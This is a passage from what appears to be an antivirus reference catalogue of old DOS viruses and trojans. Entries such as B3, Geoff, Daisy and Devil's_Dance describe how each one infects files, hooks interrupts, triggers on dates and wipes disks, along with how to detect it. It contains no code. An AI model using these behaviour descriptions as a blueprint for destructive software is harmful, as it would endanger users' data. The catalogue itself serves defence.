  4281. Virus Name: 302
  4282. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4283. Virus Length:  302 Bytes (COM)
  4284. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4285.  
  4286. Execution Procedure:
  4287. 1) The virus checks whether it is already loaded resident in memory.
  4288.     If "No", it then loads itself resident into memory by hooking INT
  4289.     21h.
  4290. 2) It then executes the original file.
  4291. 3) With itself loaded resident into memory it will infect any
  4292.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4293.  
  4294. Damage: None
  4295.  
  4296. Detection method: Infected files increase by 302 Bytes.
  4297.  
  4298. Note: The 302 virus hooks INT 24h when infecting files. It omits I/O
  4299. errors (such as write protect).
  4300.  
  4301. [Little_Brother]
  4302. Virus Name: Little_Brother
  4303. Virus Type:  Memory Resident, File Virus (Companion Virus)
  4304. Virus Length:  250 Bytes (EXE)
  4305. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4306.  
  4307. Execution Procedure:
  4308. 1) The virus checks whether it is already loaded resident in memory.
  4309.     If "No", it then loads itself resident into memory by hooking INT
  4310.     21h.
  4311. 2) It then executes the original file.
  4312. 3) With itself loaded resident into memory it will infect any
  4313.     uninfected file that is executed.  b) It doesn't infect .COM
  4314.     files.
  4315.  
  4316. Damage: When an uninfected file is executed, the virus will create a
  4317. *.COM file with the same  name as *.EXE file (example: run "AAA.EXE",
  4318. "AAA.COM" will be created by Little_Brother).
  4319.  
  4320. Detection method: Infected files increase by 250 Bytes.
  4321.  
  4322. Note: The Little_Brother virus hooks INT 24h when infecting files.
  4323. It omits I/O errors (such as write protect).
  4324.  
  4325. [ARCV-9]
  4326. Virus Name: ARCV-9
  4327. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4328. Virus Length:  771 Bytes (COM)
  4329. PC Vectors Hooked: INT 21h (AX=4B00h) (execute  program), INT 24h
  4330.  
  4331. Execution Procedure:
  4332. 1) The virus checks whether it is already loaded resident in memory.
  4333.     If "No", it then loads itself resident into memory by hooking INT
  4334.     21h.
  4335. 2) It then executes the original file.
  4336. 3) With itself loaded resident into memory it will infect any
  4337.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4338.  
  4339. Damage:   None
  4340.  
  4341. Detection method: Infected files increase by 771 bytes.
  4342.  
  4343. Note: The ARCV-9 virus hooks INT 24h when infecting files. It omits
  4344. I/O errors (such as write protect).
  4345.  
  4346. [NG-914]
  4347. Virus Name: NG-914
  4348. Virus Type:  Memory Resident, File Virus (infects .COM files)
  4349. Virus Length:  914 Bytes (COM)
  4350. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4351.  
  4352. Execution Procedure:
  4353. 1) The virus checks whether it is already loaded resident in memory.
  4354.     If "No", it then loads itself resident into memory by hooking INT
  4355.     21h.
  4356. 2) It then executes the original file.
  4357. 3) With itself loaded resident into memory it will infect any
  4358.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4359.  
  4360. Damage: None
  4361.  
  4362. Detection method: Infected files increase by 914 Bytes.
  4363.  
  4364. Note: The NG-914 virus hooks INT 24h when infecting files. It omits
  4365. I/O errors (such as write protect).
  4366.  
  4367. [Civil510]
  4368. Virus Name: Civil510
  4369. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4370. Virus Length:  2080 Bytes (COM)
  4371. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4372.  
  4373. Execution Procedure:
  4374. 1) The virus checks whether it is already loaded resident in memory.
  4375.     If "No", it then loads itself resident into memory by hooking INT
  4376.     21h.
  4377. 2) It then executes the original file.
  4378. 3) With itself loaded resident into memory it will infect any
  4379.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4380.  
  4381. Damage: None
  4382.  
  4383. Detection method: Infected files increase by 2080 Bytes.
  4384.  
  4385. Note: The Civil510 virus hooks INT 24h when infecting files. It omits
  4386. I/O errors (such as write protect).
  4387.  
  4388. [B3]
  4389. Virus Name: B3
  4390. Virus Type:  Memory Resident, File Virus (infects .COM files)
  4391. Virus Length:  483 Bytes (COM)
  4392. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4393.  
  4394. Execution Procedure:
  4395. 1) The virus checks whether the system date is the 26th of June;
  4396.     if "Yes", then it will destroy all data on the hard disk; if
  4397.     "No", the virus checks whether it is already loaded resident
  4398.     in memory. If "No", it then loads itself resident into memory
  4399.     by hooking INT 21h.
  4400. 2) It then executes the original file.
  4401. 3) With itself loaded resident into memory it will infect any
  4402.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4403.  
  4404. Damage: If the system date is the 26th of June, then the virus will
  4405. destroy all data on the hard disk.
  4406.  
  4407. Detection method: Infected files increase by 483 Bytes.
  4408.  
  4409. Note: The B3 virus hooks INT 24h when infecting files. It omits I/O
  4410. errors (such as write protect).
  4411.  
  4412. [RKO-1]
  4413. Virus Name: RKO-1
  4414. Virus Type:  Memory Resident, File Virus
  4415. Virus Length:  None.
  4416. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4417.  
  4418. Execution Procedure:
  4419. 1) The virus checks whether the system date is the 13th; if "Yes",
  4420.     it destroys all data on the hard disk; if "No", the virus checks
  4421.     whether it is already loaded resident in memory. If "No", it
  4422.     then loads itself into resident memory by hooking INT 21h.
  4423. 2) It then executes the original file.
  4424. 3) With itself loaded resident into memory it will infect any
  4425.     uninfected file that is executed or when INT 21h is called by
  4426.     AX=11h or AX=12h.
  4427.  
  4428. Damage: If system date is the 13th, then the virus will destroy all
  4429. data on the hard disk.
  4430.  
  4431. Detection method:  None
  4432.  
  4433. Note: The RKO-1 virus hooks INT 24h when infecting files. It omits
  4434. I/O errors (such as write protect).
  4435.  
  4436. [Dame]
  4437. Virus Name: Dame
  4438. Virus Type:  Memory Resident, File Virus (Mutation Engine)
  4439. Virus Length:  None
  4440. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4441.  
  4442. Execution Procedure:
  4443. 1) The virus checks whether it is already loaded resident in memory.
  4444.     If "No", it then loads itself resident into memory by hooking
  4445.     INT 21h.
  4446. 2) It then executes the original file.
  4447. 3) With itself loaded resident into memory it will infect any
  4448.     uninfected file that is executed.
  4449. 4) After it has infected files, it will check the time. If the time
  4450.     is between 12:00 A.M. and 12:30 A.M., it will show the message:
  4451.     "Don't worry, you are not alone at this hour.... This Virus is
  4452.     NOT dedicated to Sara. It's dedicated to her Groove (...That s
  4453.     my name).. This Virus is only a test therefor ..  be ready for
  4454.     my Next Test..."
  4455.  
  4456. Damage: None
  4457.  
  4458. Detection method: None
  4459.  
  4460. Note:
  4461. 1) The Dame virus hooks  INT 24h when infecting files.  It omits
  4462.     I/O errors (such as write protect).
  4463. 2) The virus will encode itself, before it infects files. And the
  4464.     method of encoding depends on the time. So it will be different
  4465.     in every file.
  4466.  
  4467. [7thson]
  4468. Virus Name: 7thson
  4469. Virus Type: Memory Resident, File Virus (Companion)
  4470. Virus Length: 321 or 307 Bytes (EXE)
  4471. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4472.  
  4473. Execution Procedure:
  4474. 1) The virus checks whether it is already loaded resident in memory.
  4475.     If "No", it then loads itself resident into memory by hooking INT
  4476.     21h.
  4477. 2) It then executes the original file.
  4478. 3) With itself loaded resident into memory it will infect any
  4479.     uninfected file that is executed.  b) It doesn't infect .COM files.
  4480.  
  4481. Damage: When you run an .EXE file, the virus will create a new .COM
  4482. file with  the same name as .EXE file and the length equals to 321 or
  4483. 307 Bytes.
  4484.  
  4485. Detection method: Check whether there are some COM files with length
  4486. equal to 321 or 307 Bytes.
  4487.  
  4488. Note: The 7thson virus hooks INT 24h and closes the "control_break"
  4489. command when infecting files. It omits I/O errors (such as write
  4490. protect).
  4491.  
  4492. [Geoff]
  4493. Virus Name: Geoff
  4494. Virus Type:  Trojan
  4495. Virus Length:  5952 Bytes
  4496. PC Vectors Hooked: INT 24h
  4497.  
  4498. Execution Procedure:
  4499. 1) Doesn't infect any file or partition or boot sector.
  4500. 2) Before destruction, it shows the message:
  4501.     "Search And Destroy Loading v1.0 Bringing The Best And Latest
  4502.     Warex....... Press [ENTER] to Start The Game."
  4503. 3) It then destroys all data of all disks if drives are ready.
  4504. 4) After destroying , it shows the message: "Hey Geoff You know what
  4505.     happened a few days ago? Some friend asked me to get rid of
  4506.     you,........ P.S. I have nothing personal against you! You just
  4507.     FUCKED with the Cold Brother and I had to take you down, again."
  4508.  
  4509. Damage: Destroys all data on all disks if drives are ready.
  4510.  
  4511. Detection method: Check for files with length equal to 5952 Bytes.
  4512.  
  4513. Note:
  4514. 1) Doesn't stay resident in memory.
  4515. 2) Geoff hooks INT 24h when destroying. It omits I/O errors (such as
  4516.     write protect).
  4517.  
  4518. [CMOSKill]
  4519. Virus Name: Cmoskill
  4520. Virus Type: Trojan
  4521. Virus Length: 29 Bytes
  4522. PC Vectors Hooked: None
  4523.  
  4524. Damage:  Deletes all CMOS data
  4525.  
  4526. Detection method:  None
  4527.  
  4528. Note:
  4529. 1) Doesn't stay resident in memory.
  4530. 2) Doesn't infect any files or partition or boot sector.
  4531.  
  4532. [Killboot]
  4533. Virus Name: Killboot
  4534. Virus Type: Trojan
  4535. Virus Length: 32000 Bytes
  4536. PC Vectors Hooked: None
  4537.  
  4538. Damage: Destroys all data in the BOOT SECTOR of C:\ and B:\, then
  4539. shows a line of codes and then the system halts.
  4540.  
  4541. Detection method:  None
  4542.  
  4543. Note:
  4544. 1) Doesn't stay resident in memory.
  4545. 2) Doesn't infect any files or partition.
  4546.  
  4547. [NUKEX]
  4548. Virus Name: NUKEX
  4549. Virus Type: Trojan
  4550. Virus Length: 469 Bytes
  4551. PC Vectors Hooked: None
  4552.  
  4553. Damage:  Deletes all files on the hard disk (including all
  4554. subdirectories).
  4555.  
  4556. Detection method:  None
  4557.  
  4558. Note:
  4559. 1) Doesn't stay resident in memory.
  4560. 2) Doesn't infect any files or partition or boot sector.
  4561.  
  4562. [Fire]
  4563. Virus Name: Fire
  4564. Virus Type: Trojan
  4565. Virus Length: 4304 Bytes
  4566. PC Vectors Hooked: INT 24h
  4567.  
  4568. Damage:  Destroys all data on all disks if drives are ready, then it
  4569. makes a sound.
  4570.  
  4571. Detection method:  Check for files with length equal to 4304 Bytes.
  4572.  
  4573. Note:
  4574. 1) Doesn't stay resident in memory.
  4575. 2) Doesn't infect any files  or partition or boot sector.
  4576. 3) The Fire virus  hooks INT 24h when destroying. It omits I/O errors
  4577.     (such as write protect).
  4578.  
  4579. [Secto]
  4580. Virus Name: Secto
  4581. Virus Type: Trojan
  4582. Virus Length: 487 Bytes
  4583. PC Vectors Hooked: None
  4584.  
  4585. Damage:  Destroys data on the boot sector of A:\.
  4586.  
  4587. Detection method:  None
  4588.  
  4589. Note:
  4590. 1) Doesn't stay resident in memory.
  4591. 2) Doesn't infect any files or partition.
  4592. 3) Doesn't hook INT 24h when destroying. An error message appears if
  4593.     there is an I/O error (such as write protect).
  4594.  
  4595. [MSK]
  4596. Virus Name: MSK
  4597. Virus Type: Trojan
  4598. Virus Length: 272 Bytes
  4599. PC Vectors Hooked: None
  4600.  
  4601. Damage:  Destroys all data on the hard disk.
  4602.  
  4603. Detection method:  Check for files with length equal to 272 Bytes.
  4604.  
  4605. Note:
  4606. 1) Doesn't stay resident in memory.
  4607. 2) Doesn't infect any files or partition or boot sector.
  4608.  
  4609. [Dropper]
  4610. Virus Name: Dropper
  4611. Virus Type: Trojan
  4612. Virus Length: 3103 Bytes
  4613. PC Vectors Hooked: None
  4614.  
  4615. Damage:  Deletes all files on disks.
  4616.  
  4617. Detection method:  Check whether there are files with 3103 Bytes.
  4618.  
  4619. Note:
  4620. 1) Doesn't stay resident in memory.
  4621. 2) Doesn't infect any files or partition or boot sector.
  4622. 3) Dropper doesn't hook INT 24h when destroying. An error message
  4623.     appears if there is an I/O error ( such  as write protect).
  4624.  
  4625. [RNA#1]
  4626. Virus Name: RNA#1
  4627. Virus Type: File Virus (infects .COM and .EXE files)
  4628. Virus Length: 7296 Bytes(COM and EXE)
  4629. PC Vectors Hooked: INT 24h
  4630.  
  4631. Execution Procedure:
  4632. 1) Searches for COM and EXE files on the C:\ drive.
  4633. 2) If found, it then deletes them (deletes four files at a time).
  4634. 3) When the files are deleted, the virus will create a file named
  4635.     "ZSQA.TH" on drive C:\.
  4636.  
  4637. Damage: It will delete files on the C:\ drive.
  4638.  
  4639. Detection method:  Infected files will increase by 7296 Bytes.
  4640.  
  4641. Note:
  4642. 1) Doesn't stay resident in memory.
  4643. 2) The RNA#1 hooks INT 24h when infecting files. It omits I/O errors
  4644.     (such as write protect).
  4645.  
  4646. [RNA#2]
  4647. Virus Name: RNA#2
  4648. Virus Type: File Virus (infects .COM and .EXE files)
  4649. Virus Length: 7408 Bytes (COM and EXE)
  4650. PC Vectors Hooked: None
  4651.  
  4652. Execution Procedure:
  4653. 1) Searches for COM and EXE files on the C:\ drive.
  4654. 2) The virus infects files four at a time.
  4655.  
  4656. Damage:  None
  4657.  
  4658. Detection method: Infected files will increase by 7408 Bytes.
  4659.  
  4660. Note:
  4661. 1) Doesn't stay resident in memory.
  4662. 2) RNA#2 doesn't hook INT 24h when infecting files. It omits I/O
  4663.     errors (such as write protect).
  4664.  
  4665. [Medical]
  4666. Virus Name: Medical
  4667. Virus Type: File Virus (infects .COM files)
  4668. Virus Length: 189 Bytes (COM)
  4669. PC Vectors Hooked: None
  4670.  
  4671. Execution Procedure:
  4672. 1) Searches for a .COM file in the current directory.
  4673. 2) It checks whether it has been infected by Medical; if "Yes", it
  4674.     continues to look for another .COM file.
  4675. 3) It only infects one file at a time.
  4676.  
  4677. Damage:  None
  4678.  
  4679. Detection method:  Infected files will increase by 189 Bytes.
  4680.  
  4681. Note: Doesn't stay resident in memory. Medical doesn't hook INT 24h
  4682. when infecting files. It omits I/O errors (such as write protect).
  4683.  
  4684. [Bob]
  4685. Virus Name: Bob
  4686. Virus Type: File Virus (infects .COM files)
  4687. Virus Length: 1117 Bytes (COM)
  4688. PC Vectors Hooked: INT 8h
  4689.  
  4690. Execution Procedure:
  4691. 1) Searches for a .COM file in the current directory.
  4692. 2) It checks whether it has been infected by Bob. If "Yes", it
  4693.     continues to look for an uninfected .COM file.
  4694. 3) It only infects three files at a time.
  4695. 4) It then checks whether the system date is the 7th of  September;
  4696.     if "Yes", the virus will hook INT 8h, and about 5 minutes later,
  4697.     one of the following messages is displayed on the screen: "Bob
  4698.     Ross lives!", "Bob Ross is watching!", "Maybe he lives here....."
  4699.     and so on.
  4700.  
  4701. Damage: If it is September 7, then a message will appear on the
  4702. screen.
  4703.  
  4704. Detection method:  Infected files will increase by 1117 Bytes.
  4705.  
  4706. Note:
  4707. 1) Doesn't stay resident in memory.
  4708. 2) Bob doesn't hook INT 24h when infecting files. It omits I/O errors
  4709.     (such as write protect).
  4710.  
  4711. [Cannabis]
  4712. Virus Name: Cannabis
  4713. Virus Type: Floppy Boot Infector
  4714. Virus Length: None.
  4715. PC Vectors Hooked: INT 13h
  4716.  
  4717. Execution Procedure:
  4718. 1) When the system is booted from an infected disk, there will be a
  4719.     1K decrease in the total system memory.
  4720. 2) It then hooks INT 13h.
  4721. 3) When you turn on the computer, the diskette will be infected by
  4722.     hooking INT 13h.
  4723.  
  4724. Damage:  None
  4725.  
  4726. Detection method:  Total memory size will decrease by 1K Bytes.
  4727.  
  4728. Note:
  4729. 1) Cannabis doesn't hook INT 24h when infecting files. It omits
  4730.     I/O errors (such as write protect).
  4731.  
  4732. [Daisy]
  4733. Virus Name: Daisy
  4734. Virus Type:  File Virus (infects .EXE files)
  4735. Virus Length: No change.
  4736. PC Vectors Hooked: None
  4737.  
  4738. Execution Procedure:
  4739. 1) Displays a smiling face and a message on the screen: "Hi, I'm Crazy
  4740.     Daisy!...   I'll format your HARD DISK! ... Say goodbye to your
  4741.     files!"
  4742. 2) The virus then searches for an .EXE file in the A:\ drive.
  4743. 3) It  checks whether it has been infected by Daisy before. If
  4744.     "Yes", it continues to look for another uninfected .EXE file.
  4745. 4) It infects all the .EXE files on the A:\ drive.
  4746. 5) Then the system halts.
  4747.  
  4748. Damage:
  4749. 1) When all of the .EXE files on the A:\ drive have been infected,
  4750.     the system halts.
  4751. 2) Overwrites original files, so the length of infected files won't
  4752.     increase.
  4753. 3) When an infected file is executed, it randomly displays one of the
  4754.     following messages:
  4755.     "Pretty day today - isn't it?"
  4756.     "Don't worry - sing a song!"
  4757.     "Life isn't easy!"
  4758.     "Don't halt your computer! Let's be friends!"
  4759.  
  4760. Detection method:  None
  4761.  
  4762. Note:
  4763. 1) Doesn't stay resident in memory.
  4764. 2) Daisy doesn't hook INT 24h when infecting files. It omits I/O errors
  4765.     (such as write protect).
  4766.  
  4767. [Son of PSMPC]
  4768. Virus Name: SON_OF_PSMPC
  4769. Virus Type:  Virus Generator
  4770. Virus Length: 17741 Bytes
  4771. PC Vectors Hooked: None
  4772.  
  4773. Execution Procedure:
  4774. 1) This is a "virus generator." When you execute PC-MPC A.CFG B.CFG...,
  4775.     then A.ASM B.ASM..., are generated. These will be viruses after
  4776.     compiling and linking.
  4777.  
  4778. Detection method:  None
  4779.  
  4780. Note:
  4781. 1) Doesn't stay resident in memory.
  4782. 2) SON_OF_PSMPC doesn't hook INT 24h when infecting files. It omits
  4783.     I/O errors (such as write protect).
  4784. 3) These generated files can have different functions such as encoding
  4785.     or infecting the COMMAND.COM file.
  4786.  
  4787. [Ear]
  4788. Virus Name: EAR
  4789. Virus Type: File Virus (infects .COM and .EXE files)
  4790. Virus Length: 1024 Bytes
  4791. PC Vectors Hooked: None
  4792.  
  4793. Execution Procedure:
  4794. 1) The virus searches for an .EXE or .COM file in the current directory.
  4795. 2) It checks whether it has been infected by EAR. If "Yes", it
  4796.     continues to look for an uninfected .COM or .EXE file.
  4797. 3) It continues infecting all COM and EXE files in the current and
  4798.     the "mother" directories until they are all infected.
  4799. 4) It then checks whether the system date is the 1st day of the month;
  4800.     if "Yes", a message appears on the screen: " PHALON/SKISM 1992
  4801.     [Ear-6] Alert! Where is the Auditory Canal located? 1. External
  4802.     Ear   2. Middle Ear 3. Inner Ear ", then waits for your choice.
  4803. 5) If you press "1" or "3", you get the following message: " Wow,
  4804.     you own your ears! Please resume work.", then it executes the
  4805.     original file.
  4806. 6) If you press "2" the following message appears: "You obviously no
  4807.     nothing about ears. Try again after some study.", then the program
  4808.     ends and doesn't execute the original file.
  4809.  
  4810. Damage: If system date is the 1st day of the month, a message will
  4811. appear on the screen.
  4812.  
  4813. Detection method:  Infected files will increase by 1024 Bytes.
  4814.  
  4815. Note:
  4816. 1) Doesn't stay resident in memory.
  4817. 2) EAR doesn't hook INT 24h when infecting files. It omits I/O errors
  4818.     (such as write protect).
  4819.  
  4820. [Dir2-910]
  4821. Virus Name: DIR2-910
  4822. Virus Type: File Virus (infects .COM and .EXE files)
  4823. Virus Length: 1024 Bytes
  4824. PC Vectors Hooked: None
  4825.  
  4826. Execution Procedure:
  4827. 1) When the virus loads itself resident in memory it will change the
  4828.     directory structure data, so that certain executable files are
  4829.     linked to itself.
  4830. 2) When you execute a file to which the DIR2-910 virus has a link,
  4831.     the virus is also executed. At this point it can begin to
  4832.     infect other files.
  4833. 3) The virus stays resident in memory but doesn't hook any interrupts.
  4834.     It uses another function to infect files.  It infects .COM and
  4835.     .EXE files when they are "READ & WRITE".
  4836.  
  4837. Damage:  When all the .COM and .EXE files have been infected on a
  4838. disk, then it will not be possible to execute any files from the disk.
  4839.  
  4840. Detection method: Check the disk by using CHKDSK.EXE. If some files
  4841. are crossed-linked to the same position, then these files must be
  4842. infected.
  4843.  
  4844. Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits
  4845. I/O errors (such as write protect).
  4846.  
  4847. [INOK-2372]
  4848. Virus Name: INOK-2372
  4849. Virus Type: File Virus (infects .COM files)
  4850. Virus Length: 2372 Bytes
  4851. PC Vectors Hooked: None
  4852.  
  4853. Execution Procedure:
  4854. 1) When the virus is executed , the following two functions are
  4855.     selected at random.
  4856.     a) It searches for a .COM file in the current directory. Then it
  4857.         checks whether it has been infected  by INOK- 2372. If "Yes",
  4858.         it continues to look for another uninfected .COM file. It only
  4859.         infects one file at a time. Then it executes the original
  4860.         file.
  4861.     b) Creates a file name "ICONKIN.COM" in the current directory,
  4862.         then it executes the file. When the file is executed, a window
  4863.         appears on the screen until you press a key, and after a while
  4864.         the window appears again.
  4865.  
  4866. Damage:  None
  4867.  
  4868. Detection method:
  4869. 1) Infected files will increase by 2372 Bytes.
  4870. 2) Check for a strange window.
  4871.  
  4872. Note:
  4873. 1) Doesn't stay resident in memory.
  4874. 2) INOK-2372 doesn't hook INT 24h when infecting files. It omits I/O
  4875.     errors (such as write protect).
  4876.  
  4877. [Multi-2]
  4878. Virus Name: Multi-2
  4879. Virus Type: Partition Table Infector, File Virus (.COM and .EXE files)
  4880. Virus Length: Not Applicable
  4881. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h
  4882.  
  4883. Execution Procedure:
  4884. 1) The virus will decrease the total system memory by 3K Bytes when
  4885.     the system is booted from an infected disk.
  4886. 2) It then checks whether it is loaded resident in memory; if "No",
  4887.     then it will load resident to the last 3K bytes of memory by
  4888.     hooking INT 21h and INT 1Ch.
  4889. 3) It infects files when they are executed.
  4890.  
  4891. Damage: None
  4892.  
  4893. Detection method: Infected files increase by 927-1000 Bytes.
  4894.  
  4895. Note:  Multi-2 hooks INT 24h when infecting files. It omits I/O errors
  4896. (such as write protect).
  4897.  
  4898. [BFD]
  4899. Virus Name: BFD
  4900. Virus Type: Boot Virus, File Virus
  4901. Virus Length: No change
  4902. PC Vectors Hooked: INT 13h, INT 24h
  4903.  
  4904. Execution Procedure:
  4905. 1) The virus decreases the total system memory by  2K Bytes when
  4906.     the system is booted from an infected disk.
  4907. 2) It loads itself resident in the last 4K Bytes of memory.
  4908. 3) It hooks INT 13h.
  4909. 4) When you turn on the computer the resident memory virus infects
  4910.     the boot sector and files when reading and writing uninfected
  4911.     disks or programs.
  4912.  
  4913. Damage: Overwrites original files, so the length of infected files
  4914. won't increase.
  4915.  
  4916. Detection method:  None
  4917.  
  4918. Note:
  4919. 1) BFD hooks INT 24h when infecting files or the boot sector. It
  4920.     omits I/O errors (such as write protect).
  4921.  
  4922. [BFD-B]
  4923. Virus Name: BFD-B
  4924. Virus Type: File Virus, Boot Sector Infector (Multi-partite Virus)
  4925. Virus Length: No change
  4926. PC Vectors Hooked: INT 13h, INT 24h
  4927.  
  4928. Execution Procedure:
  4929. 1) When you execute the file, it will check whether the boot sector
  4930.     of the hard disk has been infected; if "No", it will infect the
  4931.     boot sector.
  4932. 2) It then checks whether it has loaded itself resident in memory;
  4933.     if "No", then it loads itself resident in memory by hooking
  4934.     INT 21h and INT 13h.  After the virus has loaded itself resident
  4935.     in memory it will infect boot sectors and files while reading and
  4936.     writing uninfected disks or programs.
  4937.  
  4938. Damage: Overwrites original files, so the length of infected files
  4939. won't increase.
  4940.  
  4941. Detection method:  None
  4942.  
  4943. Note:
  4944. 1) BFD hooks INT 24h when infecting files or boot sectors. It omits
  4945.     I/O errors (such as write protect).
  4946.  
  4947. [XQR]
  4948. Virus Name: XQR
  4949. Virus Type: Partition table Infector, File Virus
  4950. Virus Length: Not Applicable
  4951. PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h
  4952.  
  4953. Execution Procedure:
  4954. 1) The virus decreases the total system memory by 4K Bytes when the
  4955.     system is booted from an infected disk.
  4956. 2) The virus loads itself resident into the last 4K Bytes of memory.
  4957. 3) It then hooks INT 13h.
  4958. 4) When the computer is turned on normally the virus will check
  4959.     whether the system date is May 4; if "Yes", a message will appear
  4960.     on the screen: " XQR: Wherever, I love you Forever and ever! The
  4961.     beautiful memory for ours in that summer time has been recorded
  4962.     in Computer history . Bon voyage, my dear XQR! "
  4963. 5) It continues to infect any executed program.
  4964.  
  4965. Damage:  When it is Sunday, the virus will change the keyboard
  4966. settings.
  4967.  
  4968. Detection method:  Check the keyboard functionality.
  4969.  
  4970. Note: XQR hooks INT 24h when infecting files. It omits I/O errors
  4971. (such as write protect).
  4972.  
  4973. [Bogus]
  4974. Virus Name: BOGUS
  4975. Virus Type: Partition table Infector, File Infector Virus
  4976. Virus Length: No change
  4977. PC Vectors Hooked: INT 21h, INT 24h, INT 13h
  4978.  
  4979. Execution Procedure:
  4980. 1) The virus decreases the total system memory by 4K Bytes when the
  4981.     system is booted from an infected disk.
  4982. 2) The virus loads itself resident into the last 4K Bytes of memory.
  4983. 3) It then hooks INT 13h.
  4984. 4) It continues to infect any executed program.
  4985.  
  4986. Damage:  When the number of infected files is larger than 2710, then
  4987. it destroys all data on the hard disk.
  4988.  
  4989. Detection method:  Check whether the file head is INT 13h (AX=90 or
  4990. 91).
  4991.  
  4992. Note:
  4993. 1) BOGUS hooks INT 24h when infecting files. It omits I/O errors
  4994.     (such as write protect).
  4995. 2) If the computer is booted from a diskette, you will not be able to
  4996.     view the hard drive.
  4997.  
  4998. [Invol-1]
  4999. Virus Name: INVOL-1
  5000. Virus Type: EXE and SYS and File Infector Virus
  5001. Virus Length: 1350/60 Bytes (EXE), 2720 Bytes (SYS)
  5002. PC Vectors Hooked: INT 21h
  5003.  
  5004. Execution Procedure:
  5005.  
  5006. EXE File:
  5007. 1) The virus searches for the first command of C:\CONFIG.SYS; if the
  5008.     command is *.*=xxxx.yyy the virus will infect the file.
  5009. 2) Then it finishes executing the original file.
  5010. 3) The file infects when an uninfected program is executed.
  5011.  
  5012. SYS File:
  5013. 1) Hooks INT 21h and loads itself resident in memory.
  5014. 2) Executes the original file.
  5015.  
  5016. Damage:  Checks whether it is 20th of the month; if "Yes", then it
  5017. destroys all hard disk data.
  5018.  
  5019. Detection method: Infected .EXE files increase by 1350 Bytes, SYS
  5020. files increase by 2720 Bytes.
  5021.  
  5022. Note:
  5023. 1) INVOL-1 doesn't hook INT 24h when infecting files. It omits I/O
  5024.     errors (such as write protect).
  5025.  
  5026. [August16]
  5027. Virus Name: August16
  5028. Other names: Iron maiden
  5029. Virus Type: Parasitic Virus (infects .COM files)
  5030. Virus Length: 636 Bytes
  5031. PC Vectors Hooked: Int 21
  5032.  
  5033. Execution Procedure:
  5034. 1) The virus checks whether the first two .COM files in the current
  5035.     directory have been infected.
  5036. 2) If "No" it will proceed to infect them.
  5037. 3) If "Yes" it checks the current directory on the C:\ drive to see
  5038.     whether it has two .COM files.
  5039. 4) If "Yes" it will proceed to infect them.
  5040. 5) Then the original file is executed.
  5041.  
  5042. Damage:
  5043. 1) August16 overwrites the original file to hide changes to the file's
  5044.     date and time in the directory listing.
  5045. 2) Adds two text strings to infected files: "*.COM AA", "=!=IRON
  5046.     MAIDEN."
  5047.  
  5048. Detection method:
  5049. 1) .COM file growth.
  5050. 2) Unexpected access to the C:\ drive.
  5051.  
  5052. Note: August16 doesn't hook INT 24h when infecting files. An error
  5053. message appears if there is an I/O error (such as write protect).
  5054.  
  5055. [BkMonday]
  5056. Virus Name: BKMonday
  5057. Other names: Virus 1055
  5058. Virus Type: File Virus
  5059. Virus Length: 1055 bytes
  5060. PC Vectors Hooked:  Int 21
  5061.  
  5062. Damage: Formats first 240 cylinders of the first hard drive.
  5063.  
  5064. Detection method: Overwrites the original file in order to hide changes
  5065. to the file after infection.
  5066.  
  5067. Note: Loads itself resident in memory.  An error message appears if
  5068. there is an I/O error (such as write protect).
  5069.  
  5070. [Devil's_Dance]
  5071. Virus Name: Devil's_Dance
  5072. Other names: Virus 941
  5073. Virus Type: File Virus
  5074. Virus Length: 941 bytes
  5075. PC Vectors Hooked:  Int 21
  5076.  
  5077. Execution Procedure:
  5078. 1) The virus checks whether it is already loaded resident in memory.
  5079.     If "No", it then loads itself resident into memory by hooking INT
  5080.     21h.
  5081. 2) It then executes the original file.
  5082. 3) With itself loaded resident into memory it will infect any
  5083.     uninfected file that is executed.
  5084.  
  5085. Damage: The Devil's_Dance virus monitors Int 9 (keyboard). A routine for
  5086. cursor manipulation is activated when 5 keys other than the  Alt key
  5087. have been depressed. Furthermore, if the  Alt key is not depressed,
  5088. attributes of the cursor in Video-RAM are changed after any other key
  5089. is pressed.  The new attributes are as follows: 09h (bright blue), 0ah
  5090. (bright green), obh (bright cyan), 0ch (bright red), 0dh (bright
  5091. violet), oeh (bright yellow). If the above five keys are not pressed,
  5092. the virus will not manifest itself. If Del is depressed, the virus will
  5093. display characters using the color white.  The virus displays the
  5094. following message: "Have you ever danced with the devil under the
  5095. weak light of the moon?.... Pray for your disk...The Joker HAHAHAHAHAHA
  5096. HAHAHAHA."
  5097.  
  5098. The virus will finally test whether any keys were pressed 2500 times.
  5099. If yes, the virus overwrites the Disk Partition Table of the first hard
  5100. disk and proceeds to crash the system.
  5101.  
  5102. Note:  Loads itself resident in memory.  An error message appears if
  5103. there is an I/O error (such as write protect).
  5104.  
  5105. [Hero-394]
  5106. Virus Name: HERO-394
  5107. Other names: None
  5108. Virus Type: File Virus
  5109. Virus Length: Increases infected EXE file size by 394 bytes.
  5110.  
  5111. Damage: None
  5112.  
  5113. Detection method: The virus will check the system date. If it is the
  5114. first day of the month, a confusing code will be displayed on the
  5115. screen.
  5116.  
  5117. [NOPX_2.1]
  5118. Virus Name: NOPX_2.1
  5119. Other names: None
  5120. Virus Type: File Virus
  5121. Virus Length: Increases infected .EXE file size by 1686 bytes,
  5122.                      also .COM file.
  5123. PC Vectors Hooked:  Int 21
  5124.  
  5125. Execution Procedure:
  5126. 1) The virus checks whether it is already loaded resident in memory.
  5127.     If "No", it then loads itself resident into memory by hooking INT
  5128.     21h.
  5129. 2) It then executes the original file.
